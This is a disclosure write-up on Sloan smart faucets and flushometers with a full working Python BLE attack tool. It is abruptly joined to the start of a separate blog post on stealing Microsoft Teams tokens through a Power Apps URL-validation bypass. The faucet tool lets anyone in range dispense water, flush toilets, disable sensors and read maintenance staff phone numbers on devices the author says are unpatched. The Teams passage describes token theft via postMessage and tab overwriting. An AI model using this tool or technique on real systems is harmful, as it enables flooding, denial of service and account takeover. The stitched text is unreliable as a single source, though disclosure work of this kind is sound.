public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c90e";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c90d";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = "d0aba888-fb10-4dc9-9b17-bdd8f490c90c";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = "d0aba888-fb10-4dc9-9b17-bdd8f490c90b";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = "d0aba888-fb10-4dc9-9b17-bdd8f490c90F";

There does seem to be a company called Aquis that offers connected faucets. Perhaps they’re one of Sloan’s partners or produced the tech for Sloan.

Aquis Multifunctional Faucet feature sheet

That ‘optional service APP’ sounds just like what we’re looking at.

OTA Firmware Update

The service UUID 1d14d6ee-fd63-4fa1-bfa4-8f47b42119f0 maps to the variable name UUID_SERVICE_OTA in our variable definitions file. Indeed, a quick search reveals this to be the Silicon Labs OTA service, which also gives us insight into the chipset used here. We’ll have to dig into this.

OTA means “Over-The-Air” and is the method used to write firmware to various BLE chipsets. As far as I can tell, the major chipset manufacturers each have their own OTA spec, and they are not interoperable even if they’re called the same thing, so it can be helpful to have chipset-specific tools to manipulate OTA. Developers can also opt into various levels of security, such as requiring firmware signature checks.

The Silicon Labs Gecko bootloader has three optional settings for secure firmware update:

  • Require signed firmware upgrade files.
  • Require encrypted firmware upgrade files.
  • Enable secure boot.

Silicon Labs defines these as:

  • Secure Boot refers to the verification of the authenticity of the application image in main flash on every boot of the device.
  • Secure Firmware Upgrade refers to the verification of the authenticity of an upgrade image before performing a bootload, and optionally enforcing that upgrade images are encrypted.

If none of those are selected by the developer, it’s possible to write any firmware to the device. As the faucet was quite expensive, I did not test firmware update and am merely pointing out that it’s exposed.

Using one of the Silicon Labs Android apps, we can quickly see that it’s possible to do an OTA firmware update. There’s no telling what the firmware in place is checking for, and I don’t want to break this thing yet.

I also grepped through the Android APK but didn’t see anything that references the three OTA variable names, which makes me think the OTA feature is stock code from the SDK and that Sloan will implement app-driven updates in the future.

Hardware — BLE Adapters

These vulns should be exploitable via any BLE adapter, but since hardware can be finicky, the specific adapters I tested with are:

Cyberkinetic Effects or Why should I even care

Sure, turning on the water might not be the next million-dollar ransomware campaign, and flushing the toilets remotely seems like a great prank, but not much more. Still, there can be real, interesting effects. First off, these faucets aren’t usually for home use; they’re installed in office buildings, in groups. Turning on all of the faucets repeatedly or flushing all of the toilets could plausibly cause a flooding condition. Move over SYN flood, this is a sink flood.

But these devices aren’t networked! They have no IP! They’re limited by range! These are great points. However, the faucet likely has a 30-foot BLE range, which is well within reach of some miscreant standing at the local donut shop near the office. A neighboring unit in a condo or apartment building would also be well within range. Also, most laptops and desktops include Bluetooth adapters, so any malware infection is a potential vector. I always like to point out that a BLE device is only a hop away from any modern laptop.

Findings

  • Enable Water Dispense > Kinetic Effect
  • Change Flow Rate > Kinetic Effect
  • Change Activation Mode / Time > Kinetic Effect / DoS
  • Change Sensor Range to 0 > DoS
  • Maintenance Person Cell Phone Number Modification and Disclosure > Information Leakage
  • Enable Toilet Flush > Kinetic Effect
  • Model Number is writable > Modification of Assumed Immutable Data

PoC || GTFlow

Here’s a quick proof of concept in case you’ve got an unpatched faucet or flushometer lying around. As of this posting, Sloan has not responded to our disclosure emails and to our knowledge has not released an update.

from bluepy.btle import Scanner, DefaultDelegate, Peripheral, UUID, BTLEDisconnectError, BTLEGattError, BTLEManagementError, BTLEInternalError

SCAN_TIMEOUT = 2.0
DEBUG = 0

UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c965")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c949")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c945")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c944")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c943")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c942")
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c906")
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c905")
UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER = UUID("00002a24-0000-1000-8000-00805f9b34fb")
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c932")
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c930")
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92e")
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92f")
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c929")
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92b")
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92a")
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92c")
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92d")
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88338")
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88337")
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88335")
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88331")
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88336")
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88334")
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88333")
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88332")
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90e")
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90d")
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90c")
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90b")
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90F")
AQUIS_UUIDS = (
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION,
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION,
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE,
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL,
    UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU,
)
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c953")
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c954")
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c951")
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c952")
LOCK_INFO = (
    UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS,
    UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE,
    UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP,
    UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY,
)
FAUCET_PHONE_UUIDS = (
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE,
    UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE,
    UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,
)
UUID_CHARACTERISTIC_OTA_CONTROL = UUID("f7bf3564-fb6d-4e53-88a4-5e37e0326063")
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER = UUID("984227f3-34fc-4045-a5d0-2c581f81a153")
OTA = (
    UUID_CHARACTERISTIC_OTA_CONTROL,
    UUID_CHARACTERISTIC_OTA_DATA_TRANSFER,
)
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94a")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94b")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94c")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94d")
NOTES = (
    UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1,
    UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2,
    UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3,
    UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4,
)
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c969")
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c968")
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966")
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c967")
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c961")
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c962")
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c964")
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c963")
DIAG = (
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT,
    UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS,
    UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS,
)
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88361")
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c971")
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c978")
UUID_CHARACTERISTIC_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb")
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb")
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88364")
BATTERY_INFO = (
    UUID_CHARACTERISTIC_BATTERY_LEVEL,
    UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL,
    UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
    UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC,
)
ATTACKS_DICT = {
    "0": ("Dispense Water", UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE, "Enter a 1 to begin Dispensing water: "),
    "1": ("Flush Toilet", UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE, "Enter a 1 to begin flushing diagnostic: "),
    "2": ("Change Faucet Flow Rate", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE, "Enter two digits together, they'll be a float (11 will be 1.1lpm): "),
    "3": ("Change Faucet Activation Mode", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION, "Enter a 0 (ondemand) or a 1 (metered) to change the activation mode.: "),
    "4": ("Change Faucet OnDemand Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME, "Enter 2 digits (10 = 10 seconds): "),
    "5": ("Change Faucet Metered Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME, "Enter 3 digits (120 = 120 seconds): "),
    "6": ("Change Sensor Range", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE, "Enter 1 digit (0 to disable sensor): "),
    "7": ("Read Maintenance Personnel Info", FAUCET_PHONE_UUIDS, "N/A"),
    "8": ("Change Model Number", UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER, "Enter a new model number: "),
    "9": ("OTA (doesn't write)", OTA, "N/A"),
    "10": ("Read HW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION, "N/A"),
    "11": ("Read FW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION, "N/A"),
    "12": ("Read AQUIS Info", AQUIS_UUIDS, "N/A"),
    "13": ("Read Locking Information", LOCK_INFO, "N/A"),
    "14": ("Read Diagnostic Info", DIAG, "N/A"),
    "15": ("Read NOTES", NOTES, "N/A"),
    "16": ("Write NOTES", NOTES, "Enter something to write to the 4 notes fields:"),
    "17": ("Production Enable", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE, "Write something to production enable: "),
    "18": ("Adaptive Sensing Enable (gain/sensitivity changes not implemented)", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE, "Write to Adaptive Sensing Enable: "),
    "19": ("Read Battery Info", BATTERY_INFO, "N/A"),
}
class ScanDelegate(DefaultDelegate):
    def __init__(self):
        DefaultDelegate.__init__(self)


def convert_num_for_writing(text):
    # Values are written to the device as plain ASCII strings.
    if len(text) > 4:
        return text.encode()
    output = text.encode()
    return output


def run_sink_flood(attack, target, p):
    attack_name = attack[0]
    uuid = attack[1]
    text = attack[2]
    target_name = target["name"]
    if type(uuid) == UUID:
        # Single characteristic: read the current value, then optionally write.
        char = p.getCharacteristics(uuid=uuid)
        if char[0].supportsRead() and attack_name != "Dispense Water":
            val = char[0].read()
            print(f"[ >] {target_name} responds with current value: {val}")
        if not text == "N/A":
            sendme = input(text)
            sendme = convert_num_for_writing(sendme)
            char[0].write(sendme, withResponse=True)
    else:
        # Tuple of characteristics: walk each one.
        for i in uuid:
            try:
                char = p.getCharacteristics(uuid=i)
                if char[0].supportsRead():
                    val = char[0].read()
                    print(f"[ >] {target_name} responds with current value: {val}")
                if not text == "N/A":
                    sendme = input(text)
                    sendme = convert_num_for_writing(sendme)
                    char[0].write(sendme, withResponse=True)
            except BTLEGattError:
                pass


def menu_pick_attack(target):
    for attack in ATTACKS_DICT.keys():
        print(f"[{attack}] {ATTACKS_DICT[attack][0]}")
    selection = input("Enter a #: ")
    return ATTACKS_DICT[selection]


def menu_pick_device(devices):
    menu = {}
    i = 1
    target = None
    for dev in devices:
        for (adtype, desc, value) in dev.getScanData():
            if desc == "Complete Local Name":
                if type(value) == str and "FAUCET" in value:
                    menu["%s" % i] = {"name": value, "dev": dev}
                    i += 1
    options = menu.keys()
    if not options:
        return None
    sorted(options)
    for entry in options:
        print(f"[{entry}] {menu[entry]['dev'].addr} {menu[entry]['name']} ")
    selection = input("Enter a device #: ")
    if selection in menu.keys():
        target = menu[selection]
    return target


def lescan():
    scanner = Scanner(1).withDelegate(ScanDelegate())
    try:
        print(f"[*] scanning for {SCAN_TIMEOUT}")
        devices = scanner.scan(SCAN_TIMEOUT)
    except BTLEManagementError:
        print("[*] Permission to use HCI unavailable, rerun with sudo or as root.")
        return
    return devices


def main():
    print("[*] starting SINK FLOOD Sloan SmartFaucet and SmartFlushometer tool")
    while True:
        found_devices = lescan()
        if found_devices:
            target = menu_pick_device(found_devices)
            if not target:
                print("[*] target not found. have you tried turning it off and on again?")
                continue
            p = Peripheral(target['dev'].addr)
            while target:
                attack = menu_pick_attack(target)
                run_sink_flood(attack, target, p)
        else:
            print("[*] something's not write. exiting.")
            exit()


if __name__ == "__main__":
    main()


Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs

14 June 2021 at 13:03

Trading up a small bug for a big impact

Intro

I recently came across an interesting bug in the Microsoft Power Apps service which, despite its simplicity, can be leveraged by an attacker to gain persistent read/write access to a victim user’s email, Teams chats, OneDrive, SharePoint and a variety of other services by way of a malicious Microsoft Teams tab and Power Automate flows. The bug has since been fixed by Microsoft, but in this blog we’re going to see how it could have been exploited.

In the following sections, we’ll take a look at how we, as baduser(at)fakecorp.ca, a member of the fakecorp.ca organization, can create a malicious Teams tab and use it to eventually steal emails, Teams messages, and files from gooduser(at)fakecorp.ca, and send emails and messages on their behalf. While the attack we will look at has a lot of moving parts, it is fairly serious, as the compromise of business email is said to have cost victims $1.8 billion in 2020.

As an example to get us started, here is a quick clip of this method being used by Bad User to steal a Word document from Good User’s private OneDrive for Business.

Teams Tabs, Power Apps and Power Automate Flows

If you are already familiar with Teams and the Power Platform, feel free to skip this section, but otherwise, it may be useful to go over the pieces of the puzzle we’ll be using later.

Microsoft Teams has a default feature that allows a user to launch small applications as a tab in any team they are part of. If that user is part of an Office 365/Teams organization with a Business Basic license or above, they also have access to a set of Teams tabs which consist of Microsoft Power Apps applications.

A Teams tab with the Bulletins Power App

Power Apps are part of the wider Microsoft Power Platform, and when a user of a particular team launches their first Power App tab, it creates what Microsoft calls a “Dataverse for Teams Environment”, which according to Microsoft “is used to store, manage, and share team-specific data, apps, and flows”.

It should also be noted that, apart from the team-specific environments, there is a default environment for the organization as a whole. This is important because users can only create connectors and flows in either the default environment, or for teams which they own, and the attack we’re going to look at requires the ability to create Power Automate flows.

Power Automate is a service which lets users create automated workflows which can operate on their Office 365 organization’s data. For example, these flows can be used to do things like send emails on a particular schedule, or send Microsoft Teams messages any time a file on SharePoint is updated.

Power Automate flow templates

The bug: trusting a bad domain

When a Power App tab is first created for a team, it runs through a deployment process that uses information gathered from the make.powerapps.com domain to install the application to the team dataverse/environment.

Installing the app

Teams tabs generally operate by opening an iframe to a page on a domain which is specified as trusted in that application’s manifest. What we see in the above image is a tab that contains an iframe to the page apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com/somePageHere, which itself is opening an iframe to the make.powerapps.com page passed in makerPortalUrl.

Immediately upon seeing this I was curious if I could make the apps.powerapps.com page load our own content. I noticed a couple of things:

  1. The apps.powerapps.com page will only load the iframe to makerPortalUrl if it is in a Microsoft Teams tab (it uses the Microsoft Teams javascript client sdk).
  2. The child iframe would only load if the makerPortalUrl begins with https://make.powerapps.com

We can see this happen if we view the page’s source, testing out different parameters. Trying to load any url which doesn’t begin with https://make.powerapps.com results in the makerPortalUrl being set to an empty string. However, the validation stops at checking whether the domain begins with make.powerapps.com, and does not check whether it is the full domain.

So, if we set makerPortalUrl equal to something like https://make.powerapps.com.fakecorp.ca/ we will be able to load our own content in the iframe!
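To make the flaw concrete, here it is reimplemented as a Python sketch (the real validation lives in the page’s javascript; startswith stands in for whatever string comparison it actually used):

from urllib.parse import urlparse

TRUSTED = "https://make.powerapps.com"

def is_trusted_prefix_only(maker_portal_url):
    # What the page effectively did: a prefix check on the url string.
    return maker_portal_url.startswith(TRUSTED)

def is_trusted_full_host(maker_portal_url):
    # What it should have done: compare the full hostname.
    return urlparse(maker_portal_url).hostname == "make.powerapps.com"

print(is_trusted_prefix_only("https://make.powerapps.com.fakecorp.ca/"))  # True -- bypass
print(is_trusted_full_host("https://make.powerapps.com.fakecorp.ca/"))    # False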

Cool, we can load an iframe with our own content two iframes deep in a Teams tab, but what does that get us? Microsoft Teams already has a website tab type which lets you load an iframe with a URL of your choosing, and with those you can’t do much. Fortunately for us, some tabs have more capabilities than others.

Stealing auth tokens with postMessage

We can load our own content in an iframe, which itself is sitting in an iframe on apps.powerapps.com. The reason this is more interesting than something like the Website tab type on Teams is that for Power App extension tab types, the apps.powerapps.com page communicates both with Teams, by way of the Teams JS SDK, and with its child iframe, using javascript postMessage.

We can communicate with the parent window via postMessage

Using a Chrome extension, we can watch the postMessages passed between windows as an application is installed and launched. At first glance, the most interesting message is a postMessage from make.powerapps.com in the innermost window (the window which we are replacing when specifying our own makerPortalUrl) to the apps.powerapps.com window, with GET_ACCESS_TOKEN in the data.

The frame which we were replacing was getting access tokens from its parent window without passing any sort of authentication.

the child iframe requesting an access token via postMessage

I tested this same kind of postMessage from the make.powerapps.com.fakecorp.ca subdomain, and sure enough, I was able to grab the same access tokens. A handler is registered in the WebPlayer.EmbedMakerPortal.js file loaded by apps.powerapps.com which fetches tokens for the requested resource using the https://apps.powerapps.com/auth/onbehalfof endpoint, which in our testing is capable of grabbing tokens for:

- apihub.azure.com
- graph.microsoft.com
- dynamics apps subdomains
- service.flow.microsoft.com
- service.powerapps.com
Grabbing the access token from a page we control

This is a super exciting thing to see: A tab under our control which can be created in a public team can retrieve access tokens on behalf of the user viewing it. Let’s slow down for a moment though, because I forgot to show an important step: how did we get our own content in a tab in the first place?

Overwriting a Teams tab

I mentioned earlier that Teams tabs generally operate by opening an iframe to a page which is specified in the tab application’s manifest. The request to define what page is loaded by a tab can be seen when adding a new tab or even renaming a currently existing tab.

The PUT request for renaming a tab lets us change the tab url

The url being given in this PUT request is pointing to the Bulletins Power App which is installed in our team environment. To point the tab to our malicious content we simply have to replace that url with our apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com.fakecorp.ca page.

It should be noted that this only works because we are passing a url with a trusted domain (apps.powerapps.com) according to the application’s manifest. If we try to pass malicious content directly as the tab’s url, the tab will not load our content.

A short and inconspicuous proof of concept

While the attacks we will look at later are longer and overly noisy for demonstration purposes, let’s consider a very quick proof of concept of how we could use what we currently have to steal access tokens from unsuspecting users.

If we host a page similar to the following and overwrite a tab to point to it, we can grab users’ service.flow.microsoft.com token and send it to another listener we control, while also loading the original Power App in an iframe that matches the tab size. While it won’t look exactly like a normally-running Power App tab, it doesn’t look different enough to notice. If the application requires postMessage communication with the parent app, we could even act as a man-in-the-middle for the postMessages being sent and received by adding a message handler to the PoC.

During the loading you can see two spinning circles. The smaller one is our JS running.

Now that we know we can steal certain tokens, let’s see what we can do with them, specifically the service.flow.microsoft.com token we just stole.

Stealing more tokens, emails, messages and files

The reason we’re focused on the service.flow.microsoft.com token is because it can be used to get us access to more tokens, and to create Power Automate flows, which will allow us to access a user’s email from Outlook, Teams messages, files from OneDrive and SharePoint, and a whole lot more.

We will construct the attack, at a high level, by:

- Grabbing an extra set of tokens from api.flow.microsoft.com
- Creating connectors to the services we want to access.
- Consenting on behalf of the victim user using first party logins
